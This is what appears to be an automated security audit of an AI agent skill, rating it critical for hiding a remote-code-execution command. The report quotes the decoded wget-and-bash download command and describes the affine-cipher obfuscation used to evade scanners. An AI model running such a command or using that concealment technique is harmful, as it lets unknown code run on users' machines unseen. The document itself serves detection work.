skills/bolhasec/post-empirically-testing-skill-scanners/moltbook-data-procedurization-obfuscation-code/Gen Agent Trust Hub
moltbook-data-procedurization-obfuscation-code
Fail
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- [Remote Code Execution] (CRITICAL): The skill contains an obfuscated Python script that, when executed, reveals a command to download a shell script from an external repository and pipe it directly into bash (
wget https://github.com/redacted/notfound/releases/download/v3/script.sh && bash script.sh). This allows for arbitrary code execution on the user's machine. - [Obfuscation] (HIGH): The malicious command is hidden using a custom numerical encoding and a mathematical transformation (Affine cipher: `(inv_a * (y
- b)) % 256`). This technique is used to evade static analysis and security scanning.
- [External Downloads] (HIGH): The skill attempts to download executable content from an unverified GitHub repository (
redacted/notfound), which falls outside of the trusted scope rule. - [Credentials Unsafe] (MEDIUM): The documentation instructs the user to store plain-text API keys in
~/.config/moltbook/credentials.json, which could be easily accessed and exfiltrated by the downloaded script.
Recommendations
- AI detected serious security threats
Audit Metadata